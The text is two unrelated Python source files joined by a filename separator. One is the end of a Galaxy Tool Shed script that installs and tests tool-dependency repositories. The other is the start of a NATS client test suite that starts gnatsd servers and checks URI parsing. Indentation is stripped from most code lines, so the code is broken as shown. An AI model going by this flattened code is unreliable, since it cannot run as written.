test_framework = install_and_test_base_util.TOOL_DEPENDENCY_DEFINITIONS
def install_and_test_repositories( app, galaxy_shed_tools_dict_file, galaxy_shed_tool_conf_file, galaxy_shed_tool_path ):
# Initialize a dictionary for the summary that will be printed to stdout.
install_and_test_statistics_dict = install_and_test_base_util.initialize_install_and_test_statistics_dict()
error_message = ''
repositories_to_install, error_message = \
install_and_test_base_util.get_repositories_to_install( install_and_test_base_util.galaxy_tool_shed_url, test_framework )
if error_message:
return None, error_message
print 'The exclude list file is defined as %s' % exclude_list_file
if os.path.exists( exclude_list_file ):
print 'Loading the list of repositories excluded from testing from the file %s...' % exclude_list_file
# The following exclude_list will look something like this:
# [{ 'reason': The default reason or the reason specified in this section,
# 'repositories': [( name, owner, changeset_revision if changeset_revision else None ),
# ( name, owner, changeset_revision if changeset_revision else None )]}]
exclude_list_dicts = install_and_test_base_util.parse_exclude_list( exclude_list_file )
else:
print 'The exclude list file %s does not exist, so no repositories will be excluded from testing.' % exclude_list_file
exclude_list_dicts = []
# Generate a test method that will use Twill to install each repository into the embedded Galaxy application that was
# started up, installing repository and tool dependencies. Upon successful installation, generate a test case for each
# functional test defined for each tool in the repository and execute the test cases. Record the result of the tests.
    # The traceback and captured output of the tool that was run will be recorded for test failures.
# completed, the repository is uninstalled, so test cases don't interfere with the next repository's functional tests.
for repository_dict in repositories_to_install:
encoded_repository_metadata_id = repository_dict.get( 'id', None )
# Add the URL for the tool shed we're installing from, so the automated installation methods go to the right place.
repository_dict[ 'tool_shed_url' ] = install_and_test_base_util.galaxy_tool_shed_url
# Get the name and owner out of the repository info dict.
name = str( repository_dict.get( 'name', '' ) )
owner = str( repository_dict.get( 'owner', '' ) )
changeset_revision = str( repository_dict.get( 'changeset_revision', '' ) )
print "Processing revision %s of repository %s owned by %s..." % ( changeset_revision, name, owner )
repository_identifier_tup = ( name, owner, changeset_revision )
install_and_test_statistics_dict[ 'total_repositories_processed' ] += 1
# Retrieve the stored list of tool_test_results_dicts.
tool_test_results_dicts, error_message = \
install_and_test_base_util.get_tool_test_results_dicts( install_and_test_base_util.galaxy_tool_shed_url,
encoded_repository_metadata_id )
if error_message:
print 'Cannot install version %s of repository %s owned by %s due to the following error getting tool_test_results:\n%s' % \
( changeset_revision, name, owner, str( error_message ) )
else:
tool_test_results_dict = install_and_test_base_util.get_tool_test_results_dict( tool_test_results_dicts )
is_excluded, reason = install_and_test_base_util.is_excluded( exclude_list_dicts,
name,
owner,
changeset_revision,
encoded_repository_metadata_id )
if is_excluded:
# If this repository is being skipped, register the reason.
print "Not testing revision %s of repository %s owned by %s because it is in the exclude list for this test run." % \
( changeset_revision, name, owner )
tool_test_results_dict[ 'not_tested' ] = dict( reason=reason )
params = dict( do_not_test=False )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
else:
# See if the repository was installed in a previous test.
repository = install_and_test_base_util.get_repository( name, owner, changeset_revision )
if repository is None:
# The repository was not previously installed, so install it now.
start_time = time.time()
tool_test_results_dict = install_and_test_base_util.initialize_tool_tests_results_dict( app, tool_test_results_dict )
repository, error_message = install_and_test_base_util.install_repository( app, repository_dict )
if error_message:
# The repository installation failed.
print 'Installation failed for revision %s of repository %s owned by %s.' % ( changeset_revision, name, owner )
processed_repositories_with_installation_error = \
install_and_test_statistics_dict.get( 'repositories_with_installation_error', [] )
if repository_identifier_tup not in processed_repositories_with_installation_error:
install_and_test_statistics_dict[ 'repositories_with_installation_error' ].append( repository_identifier_tup )
current_repository_installation_error_dict = dict( tool_shed=install_and_test_base_util.galaxy_tool_shed_url,
name=name,
owner=owner,
changeset_revision=changeset_revision,
error_message=error_message )
tool_test_results_dict[ 'installation_errors' ][ 'current_repository' ].append( current_repository_installation_error_dict )
params = dict( test_install_error=True,
do_not_test=False )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
else:
# The repository was successfully installed.
print 'Installation succeeded for revision %s of repository %s owned by %s.' % \
( changeset_revision, name, owner )
# Populate the installation containers (success and error) for the repository's immediate dependencies
# (the entire dependency tree is not handled here).
params, install_and_test_statistics_dict, tool_test_results_dict = \
install_and_test_base_util.populate_dependency_install_containers( app,
repository,
repository_identifier_tup,
install_and_test_statistics_dict,
tool_test_results_dict )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
# Populate the installation containers (success or error) for the repository's immediate repository
# dependencies whose containers are not yet populated.
install_and_test_base_util.populate_install_containers_for_repository_dependencies( app,
repository,
encoded_repository_metadata_id,
install_and_test_statistics_dict,
can_update_tool_shed )
print '\nAttempting to install revision %s of repository %s owned by %s took %s seconds.\n' % \
( changeset_revision, name, owner, str( time.time() - start_time ) )
else:
print 'Skipped attempt to install revision %s of repository %s owned by %s because ' % \
( changeset_revision, name, owner )
print 'it was previously installed and currently has status %s' % repository.status
return install_and_test_statistics_dict, error_message
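# Note: the returned install_and_test_statistics_dict tracks at least 'total_repositories_processed'
# and 'repositories_with_installation_error' (see usage above); the full set of keys is defined by
# install_and_test_base_util.initialize_install_and_test_statistics_dict().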
def main():
if install_and_test_base_util.tool_shed_api_key is None:
# If the tool shed URL specified in any dict is not present in the tool_sheds_conf.xml, the installation will fail.
        log.debug( 'Cannot proceed without a valid tool shed API key set in the environment variable GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY.' )
return 1
if install_and_test_base_util.galaxy_tool_shed_url is None:
log.debug( 'Cannot proceed without a valid Tool Shed base URL set in the environment variable GALAXY_INSTALL_TEST_TOOL_SHED_URL.' )
return 1
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_INSTALL_TEST_HOST', install_and_test_base_util.default_galaxy_test_host )
# Set the GALAXY_INSTALL_TEST_HOST variable so that Twill will have the Galaxy url to which to
# install repositories.
os.environ[ 'GALAXY_INSTALL_TEST_HOST' ] = galaxy_test_host
# Set the GALAXY_TEST_HOST environment variable so that the toolbox tests will have the Galaxy url
    # on which to run tool functional tests.
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
galaxy_test_port = os.environ.get( 'GALAXY_INSTALL_TEST_PORT', str( install_and_test_base_util.default_galaxy_test_port_max ) )
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
galaxy_test_file_dir = os.environ.get( 'GALAXY_INSTALL_TEST_FILE_DIR', default_galaxy_test_file_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.abspath( galaxy_test_file_dir )
use_distributed_object_store = os.environ.get( 'GALAXY_INSTALL_TEST_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( galaxy_test_tmp_dir ):
os.mkdir( galaxy_test_tmp_dir )
# Set up the configuration files for the Galaxy instance.
galaxy_shed_tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_PATH',
tempfile.mkdtemp( dir=galaxy_test_tmp_dir, prefix='shed_tools' ) )
shed_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_data_table_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_TABLE_CONF',
install_and_test_base_util.tool_data_table_conf )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_job_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_MIGRATED_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_tool_sheds_conf.xml' ) )
galaxy_shed_tools_dict_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DICT_FILE',
os.path.join( galaxy_test_tmp_dir, 'shed_tool_dict' ) )
install_and_test_base_util.populate_galaxy_shed_tools_dict_file( galaxy_shed_tools_dict_file,
shed_tools_dict=None )
# Set the GALAXY_TOOL_SHED_TEST_FILE environment variable to the path of the shed_tools_dict file so that
# test.base.twilltestcase.setUp will find and parse it properly.
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_shed_tools_dict_file
if 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' ] = tool_data_path
# Configure the database connection and path.
if 'GALAXY_INSTALL_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_INSTALL_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to install and test tools.
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
new_repos_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Set up the tool dependency path for the Galaxy instance.
tool_dependency_dir = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR', None )
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
os.environ[ 'GALAXY_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
if 'GALAXY_INSTALL_TEST_DBURI' in os.environ:
database_connection = os.environ[ 'GALAXY_INSTALL_TEST_DBURI' ]
else:
database_connection = 'sqlite:///' + os.path.join( galaxy_db_path, 'install_and_test_repositories.sqlite' )
if 'GALAXY_INSTALL_TEST_INSTALL_DBURI' in os.environ:
install_database_connection = os.environ[ 'GALAXY_INSTALL_TEST_INSTALL_DBURI' ]
elif asbool( os.environ.get( 'GALAXY_TEST_INSTALL_DB_MERGED', default_install_db_merged ) ):
install_database_connection = database_connection
else:
install_galaxy_db_path = os.path.join( galaxy_db_path, 'install.sqlite' )
install_database_connection = 'sqlite:///%s' % install_galaxy_db_path
kwargs = {}
for dir in [ galaxy_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Database connection: ", database_connection
print "Install database connection: ", install_database_connection
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( install_and_test_base_util.tool_data_table_conf_xml_template )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Start up a Galaxy instance ------------------------------------------------------
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( install_and_test_base_util.tool_conf_xml )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( install_and_test_base_util.job_conf_xml )
    # Generate the tool_sheds_conf.xml file, but only if the user has not specified an existing one in the environment.
if 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF' not in os.environ:
file( galaxy_tool_sheds_conf_file, 'w' ).write( install_and_test_base_util.tool_sheds_conf_xml )
# Generate the shed_tool_conf.xml file.
install_and_test_base_util.populate_shed_conf_file( galaxy_shed_tool_conf_file, galaxy_shed_tool_path, xml_elems=None )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate the migrated_tool_conf.xml file.
install_and_test_base_util.populate_shed_conf_file( galaxy_migrated_tool_conf_file, galaxy_migrated_tool_path, xml_elems=None )
# Write the embedded web application's specific configuration to a temporary file. This is necessary in order for
# the external metadata script to find the right datasets.
kwargs = dict( admin_users = '[email protected]',
master_api_key = install_and_test_base_util.default_galaxy_master_api_key,
allow_user_creation = True,
allow_user_deletion = True,
allow_library_path_paste = True,
database_connection = database_connection,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
file_path = galaxy_file_path,
id_secret = install_and_test_base_util.galaxy_encode_secret,
install_database_connection = install_database_connection,
job_config_file = galaxy_job_conf_file,
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests = True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_config_file = ','.join( [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ] ),
tool_data_path = tool_data_path,
tool_dependency_dir = tool_dependency_dir,
tool_path = tool_path,
tool_parse_help = False,
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False )
if os.path.exists( galaxy_tool_data_table_conf_file ):
kwargs[ 'tool_data_table_config_path' ] = galaxy_tool_data_table_conf_file
galaxy_config_file = os.environ.get( 'GALAXY_INSTALL_TEST_INI_FILE', None )
# If the user has passed in a path for the .ini file, do not overwrite it.
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'install_test_tool_shed_repositories_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
kwargs[ 'tool_config_file' ] = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ]
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = install_and_test_base_util.get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
# ---- Build Galaxy Application --------------------------------------------------
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
kwargs[ 'config_file' ] = galaxy_config_file
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
log.debug( "Embedded Galaxy application started..." )
# ---- Run galaxy webserver ------------------------------------------------------
server = None
global_conf = install_and_test_base_util.get_webapp_global_conf()
global_conf[ 'database_file' ] = database_connection
webapp = buildapp.app_factory( global_conf,
use_translogger=False,
static_enabled=install_and_test_base_util.STATIC_ENABLED,
app=app )
# Serve the app on a specified or random port.
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( install_and_test_base_util.default_galaxy_test_port_min,
install_and_test_base_util.default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s", galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
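                # errno 98 is EADDRINUSE on Linux, so retry with another randomly chosen port.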
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( install_and_test_base_util.default_galaxy_test_port_min, install_and_test_base_util.default_galaxy_test_port_max ) )
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_port
# Start the server.
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up.
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
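    # The else clause below belongs to the for loop and only runs if no attempt succeeded (i.e. no break).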
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
print "Embedded galaxy web server started..."
print "The embedded Galaxy application is running on %s:%s" % ( galaxy_test_host, galaxy_test_port )
print "Repositories will be installed from the tool shed at %s" % install_and_test_base_util.galaxy_tool_shed_url
# If a tool_data_table_conf.test.xml file was found, add the entries from it into the app's tool data tables.
if install_and_test_base_util.additional_tool_data_tables:
app.tool_data_tables.add_new_entries_from_config_file( config_filename=install_and_test_base_util.additional_tool_data_tables,
tool_data_path=install_and_test_base_util.additional_tool_data_path,
shed_tool_data_table_config=None,
persist=False )
now = time.strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - installation script for repositories of type tool_dependency_definition started." % now
if not can_update_tool_shed:
print "# This run will not update the Tool Shed database."
print "####################################################################################"
install_and_test_statistics_dict, error_message = install_and_test_repositories( app,
galaxy_shed_tools_dict_file,
galaxy_shed_tool_conf_file,
galaxy_shed_tool_path )
try:
install_and_test_base_util.print_install_and_test_results( 'tool dependency definitions',
install_and_test_statistics_dict,
error_message )
except Exception, e:
log.exception( 'Attempting to print the following dictionary...\n\n%s\n\n...threw the following exception...\n\n%s\n\n' % \
( str( install_and_test_statistics_dict ), str( e ) ) )
log.debug( "Shutting down..." )
# Gracefully shut down the embedded web server and UniverseApplication.
if server:
log.debug( "Shutting down embedded galaxy web server..." )
server.server_close()
server = None
log.debug( "Embedded galaxy server stopped..." )
if app:
log.debug( "Shutting down galaxy application..." )
app.shutdown()
app = None
log.debug( "Embedded galaxy application stopped..." )
# Clean up test files unless otherwise specified.
if 'GALAXY_INSTALL_TEST_NO_CLEANUP' not in os.environ:
for dir in [ galaxy_test_tmp_dir ]:
if os.path.exists( dir ):
try:
shutil.rmtree( dir )
log.debug( "Cleaned up temporary files in %s", str( dir ) )
except:
pass
else:
log.debug( 'GALAXY_INSTALL_TEST_NO_CLEANUP set, not cleaning up.' )
# Return a "successful" response to buildbot.
return 0
if __name__ == "__main__":
# The tool_test_results_dict should always have the following structure:
# {
# "test_environment":
# {
# "galaxy_revision": "9001:abcd1234",
# "galaxy_database_version": "114",
# "tool_shed_revision": "9001:abcd1234",
# "tool_shed_mercurial_version": "2.3.1",
# "tool_shed_database_version": "17",
# "python_version": "2.7.2",
# "architecture": "x86_64",
# "system": "Darwin 12.2.0"
# },
# "successful_installation":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'installation_directory': 'The installation directory path.'
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
    #                     'name': 'The name of the repository that was installed.',
    #                     'owner': 'Owner of the installed repository.',
    #                     'changeset_revision': 'Changeset revision of the installed repository.'
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
    #                     'name': 'The name of the repository that was installed.',
    #                     'owner': 'Owner of the installed repository.',
    #                     'changeset_revision': 'Changeset revision of the installed repository.'
# },
# ],
# }
# "installation_errors":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'error_message': 'The error message returned when installation was attempted.',
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# }
# }
sys.exit( main() )
|
client_test.py
|
import sys
import unittest
import tornado.httpclient
import tornado.concurrent
import tornado.testing
import tornado.gen
import tornado.ioloop
import tornado.iostream
import tornado.tcpserver
import subprocess
import threading
import tempfile
import time
import json
import socket
import ssl
import os
from datetime import timedelta
from collections import defaultdict as Hash
from nats.io import Client
from nats.io import Client as NATS
from nats.io.errors import *
from nats.io.utils import new_inbox, INBOX_PREFIX
from nats.protocol.parser import *
from nats import __lang__, __version__
class Gnatsd(object):
def __init__(
self,
port=4222,
user="",
password="",
timeout=0,
http_port=8222,
config_file=None,
debug=False,
conf=None,
cluster_port=None,
):
self.port = port
self.user = user
self.password = password
self.timeout = timeout
self.http_port = http_port
self.cluster_port = cluster_port
self.proc = None
self.debug = debug
self.config_file = config_file
self.conf = conf
self.thread = None
env_debug_flag = os.environ.get("DEBUG_NATS_TEST")
if env_debug_flag == "true":
self.debug = True
    def __enter__(self):
        """Start the gnatsd server when used as a context manager."""
config_file = tempfile.NamedTemporaryFile(mode='w', delete=True)
self.config_file = config_file
self.config_file.write(self.conf)
self.config_file.flush()
t = threading.Thread(target=self.start)
self.thread = t
self.thread.start()
http = tornado.httpclient.HTTPClient()
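        # Poll the gnatsd monitoring endpoint (/varz) until it responds, which signals that
        # the server started in the background thread is up.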
while True:
try:
response = http.fetch(
'http://127.0.0.1:%d/varz' % self.http_port)
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
return self
    def __exit__(self, *exc_info):
        """Shut down the gnatsd server when leaving the context manager."""
self.finish()
self.thread.join()
def start(self):
cmd = ["gnatsd"]
cmd.append("-p")
cmd.append("%d" % self.port)
cmd.append("-m")
cmd.append("%d" % self.http_port)
if self.cluster_port is not None:
cmd.append("--cluster")
cmd.append("nats://127.0.0.1:%d" % self.cluster_port)
if self.config_file is not None:
cmd.append("-c")
cmd.append(self.config_file.name)
if self.user != "":
cmd.append("--user")
cmd.append(self.user)
if self.password != "":
cmd.append("--pass")
cmd.append(self.password)
if self.debug:
cmd.append("-DV")
if self.debug:
self.proc = subprocess.Popen(cmd)
else:
# Redirect to dev null all server output
devnull = open(os.devnull, 'w')
self.proc = subprocess.Popen(
cmd, stdout=devnull, stderr=subprocess.STDOUT)
if self.debug:
if self.proc is None:
                print(
                    "[\033[0;33mDEBUG\033[0;0m] Failed to start server listening on port %d."
% self.port)
else:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on port %d started."
% self.port)
def finish(self):
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on %d will stop."
% self.port)
if self.debug and self.proc is None:
print(
"[\033[0;31mDEBUG\033[0;0m] Failed terminating server listening on port %d"
% self.port)
else:
try:
self.proc.terminate()
self.proc.wait()
except Exception as e:
if self.debug:
print(
"[\033[0;33m WARN\033[0;0m] Could not stop server listening on %d. (%s)"
% (self.port, e))
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on %d was stopped."
% self.port)
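# Typical usage of the helper above (a sketch; it assumes a local `gnatsd` binary on the PATH):
#
#     with Gnatsd(port=4449, http_port=8449, conf="") as natsd:
#         # ... exercise a client against nats://127.0.0.1:4449 ...
#         natsd.finish()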
class Log():
def __init__(self, debug=False):
self.records = Hash(list)
self.debug = debug
def persist(self, msg):
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Message received: [{0} {1} {2}].".
format(msg.subject, msg.reply, msg.data))
self.records[msg.subject].append(msg)
class ClientUtilsTest(unittest.TestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
def test_default_connect_command(self):
nc = Client()
nc.options["verbose"] = False
nc.options["pedantic"] = False
nc.options["auth_required"] = False
nc.options["name"] = None
nc.options["no_echo"] = False
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": false, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
def test_default_connect_command_with_name(self):
nc = Client()
nc.options["verbose"] = False
nc.options["pedantic"] = False
nc.options["auth_required"] = False
nc.options["name"] = "secret"
nc.options["no_echo"] = False
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "name": "secret", "pedantic": false, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
def tests_generate_new_inbox(self):
inbox = new_inbox()
self.assertTrue(inbox.startswith(INBOX_PREFIX))
min_expected_len = len(INBOX_PREFIX)
self.assertTrue(len(inbox) > min_expected_len)
class ClientTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server = Gnatsd(port=4222)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch('http://127.0.0.1:8222/varz')
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientTest, self).tearDown()
@tornado.testing.gen_test
def test_connect_verbose(self):
nc = Client()
options = {"verbose": True, "io_loop": self.io_loop}
yield nc.connect(**options)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": false, "protocol": 1, "verbose": true, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
@tornado.testing.gen_test
def test_connect_pedantic(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop, pedantic=True)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": true, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
@tornado.testing.gen_test
def test_connect_custom_connect_timeout(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop, connect_timeout=1)
self.assertEqual(1, nc.options["connect_timeout"])
@tornado.testing.gen_test
def test_parse_info(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
self.assertIn("server_id", info_keys)
self.assertIn("version", info_keys)
self.assertIn("go", info_keys)
self.assertIn("host", info_keys)
self.assertIn("port", info_keys)
self.assertIn("max_payload", info_keys)
self.assertIn("client_id", info_keys)
def test_connect_syntax_sugar(self):
nc = NATS()
nc._setup_server_pool(["nats://127.0.0.1:4222", "nats://127.0.0.1:4223", "nats://127.0.0.1:4224"])
self.assertEqual(3, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("nats://127.0.0.1:4222")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("127.0.0.1:4222")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("nats://127.0.0.1:")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("127.0.0.1")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
nc._setup_server_pool("demo.nats.io")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual("demo.nats.io", nc._server_pool[0].uri.hostname)
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
nc._setup_server_pool("localhost:")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("::")
self.assertEqual(0, len(nc._server_pool))
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("nats://")
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("://")
self.assertEqual(0, len(nc._server_pool))
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("")
self.assertEqual(0, len(nc._server_pool))
# Auth examples
nc = NATS()
nc._setup_server_pool("hello:[email protected]:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("hello", uri.username)
self.assertEqual("world", uri.password)
nc = NATS()
nc._setup_server_pool("hello:@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("hello", uri.username)
self.assertEqual("", uri.password)
nc = NATS()
nc._setup_server_pool(":@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual("", uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
